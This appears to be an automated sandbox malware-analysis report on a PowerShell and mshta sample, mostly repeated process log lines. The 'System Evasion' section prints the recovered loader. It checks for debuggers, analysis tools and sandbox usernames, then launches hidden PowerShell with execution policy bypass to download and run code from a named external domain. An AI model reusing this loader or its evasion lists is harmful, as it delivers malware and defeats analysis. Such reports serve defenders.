Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PROCMON.EXE
Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PROCESSHACKER.EXE
Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: HOOKEXPLORER.EXE
Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AUTORUNSC.EXE
Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OLLYDBG.EXE
Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: X64DBG.EXE
Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: FUNCTION CHECKPROCESS ($A){IF (GWMI WIN32_PROCESS \| WHERE {$_.NAME -EQ $A}){EXIT}};FUNCTION CHECKNAME($A){IF($A -EQ $ENV:USERNAME){EXIT}};$A1 = "IDAQ.EXE","IDAQ64.EXE","AUTORUNS.EXE","DUMPCAP.EXE","DE4DOT.EXE","HOOKEXPLORER.EXE","ILSPY.EXE","LORDPE.EXE","DNSPY.EXE","PETOOLS.EXE","AUTORUNSC.EXE","RESOURCEHACKER.EXE","FILEMON.EXE","REGMON.EXE","PROCEXP.EXE","PROCEXP64.EXE","TCPVIEW.EXE","TCPVIEW64.EXE","PROCMON.EXE","PROCMON64.EXE","VMMAP.EXE""VMMAP64.EXE","PORTMON.EXE","PROCESSLASSO.EXE","WIRESHARK.EXE","FIDDLER EVERYWHERE.EXE","FIDDLER.EXE","IDA.EXE","IDA64.EXE","IMMUNITYDEBUGGER.EXE","WINDUMP.EXE","X64DBG.EXE","X32DBG.EXE","OLLYDBG.EXE","PROCESSHACKER.EXE";$A2 = "ANONYMOUS", "ANDY","COMPUTERNAME","CUCKOO","NMSDBOX","XXXX-OX","CWSX","WILBERT-SC","XPAMAST-SC""SANDBOX","7SILVIA","HAL9TH","HANSPETER-PC","JOHN-PC","MUELLER-PC","WIN7-TRAPS","FORTINET","TEQUILABOOMBOOM";FOREACH ($I IN $A1 ){CHECKPROCESS($I);}FOREACH($I IN $A2 ){CHECKNAME($I);};START-PROCESS -FILEPATH "C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE" -ARGUMENTLIST "-NOPROFILE -EXECUTIONPOLICY BYPASS -COMMAND & {IEX ((NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING('HTTPS://CDN1.KLIPBAZYXUI.SHOP/VANKOK.VSTX'))}" -WINDOWSTYLE HIDDEN;$KOOFE = $ENV:APPDATA;FUNCTION WMFSF($VABSC, $OQIY){[IO.FILE]::WRITEALLBYTES($OQIY, (NEW-OBJECT (ITLU $CSIZ.SUBSTRING(103,26))).DOWNLOADDATA($VABSC))};FUNCTION ITLU($IZOOJ){RETURN (($IZOOJ -SPLIT '(?<=\G..)'\|%{$CSIZ.SUBSTRING(3,100)[$_]}) -JOIN '' -REPLACE ".$")}FUNCTION IZOOJ(){FUNCTION RGDG($HZTNZ){IF(!(TEST-PATH -PATH $OQIY)){WMFSF (ITLU $HZTNZ) $OQIY}}}IZOOJ;
Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: REGMON.EXE
Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: IEX-7IW8*QJH5XK/TJAS)C/46CYZVR2VDDE{PUWO;#W1MB~IGM0UB_LOA@TK#S;DQ\M:Y(J"RC49{{8.%6NXP}ZGQF.3RSFHNQAEHXL93315576353142709944317955FUNCTION CHECKPROCESS ($A){IF (GWMI WIN32_PROCESS \| WHERE {$_.NAME -EQ $A}){EXIT}};FUNCTION CHECKNAME($A){IF($A -EQ $ENV:USERNAME){EXIT}};$A1 = "IDAQ.EXE","IDAQ64.EXE","AUTORUNS.EXE","DUMPCAP.EXE","DE4DOT.EXE","HOOKEXPLORER.EXE","ILSPY.EXE","LORDPE.EXE","DNSPY.EXE","PETOOLS.EXE","AUTORUNSC.EXE","RESOURCEHACKER.EXE","FILEMON.EXE","REGMON.EXE","PROCEXP.EXE","PROCEXP64.EXE","TCPVIEW.EXE","TCPVIEW64.EXE","PROCMON.EXE","PROCMON64.EXE","VMMAP.EXE""VMMAP64.EXE","PORTMON.EXE","PROCESSLASSO.EXE","WIRESHARK.EXE","FIDDLER EVERYWHERE.EXE","FIDDLER.EXE","IDA.EXE","IDA64.EXE","IMMUNITYDEBUGGER.EXE","WINDUMP.EXE","X64DBG.EXE","X32DBG.EXE","OLLYDBG.EXE","PROCESSHACKER.EXE";$A2 = "ANONYMOUS", "ANDY","COMPUTERNAME","CUCKOO","NMSDBOX","XXXX-OX","CWSX","WILBERT-SC","XPAMAST-SC""SANDBOX","7SILVIA","HAL9TH","HANSPETER-PC","JOHN-PC","MUELLER-PC","WIN7-TRAPS","FORTINET","TEQUILABOOMBOOM";FOREACH ($I IN $A1 ){CHECKPROCESS($I);}FOREACH($I IN $A2 ){CHECKNAME($I);};START-PROCESS -FILEPATH "C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE" -ARGUMENTLIST "-NOPROFILE -EXECUTIONPOLICY BYPASS -COMMAND & {IEX ((NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING('HTTPS://CDN1.KLIPBAZYXUI.SHOP/VANKOK.VSTX'))}" -WINDOWSTYLE HIDDEN;$KOOFE = $ENV:APPDATA;FUNCTION WMFSF($VABSC, $OQIY){[IO.FILE]::WRITEALLBYTES($OQIY, (NEW-OBJECT (ITLU $CSIZ.SUBSTRING(103,26))).DOWNLOADDATA($VABSC))};FUNCTION ITLU($IZOOJ){RETURN (($IZOOJ -SPLIT '(?<=\G..)'\|%{$CSIZ.SUBSTRING(3,100)[$_]}) -JOIN '' -REPLACE ".$")}FUNCTION IZOOJ(){FUNCTION RGDG($HZTNZ){IF(!(TEST-PATH -PATH $OQIY)){WMFSF (ITLU $HZTNZ) $OQIY}}}IZOOJ;XR
Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AUTORUNS.EXE
Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PETOOLS.EXE
Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: FIDDLER.EXE
Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WINDUMP.EXE
Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: IDAQ.EXE
Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: DUMPCAP.EXE
Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WIRESHARK.EXE
Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: FILEMON.EXE

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5430	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3639	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3701	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6092	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7196	Thread sleep time: -20291418481080494s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7580	Thread sleep time: -21213755684765971s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4568	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	File opened: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_c0da534e38c01f4d	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	File opened: C:\Windows\SysWOW64\OneCoreUAPCommonProxyStub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	File opened: C:\Windows\SysWOW64\OneCoreCommonProxyStub.dll	Jump to behavior
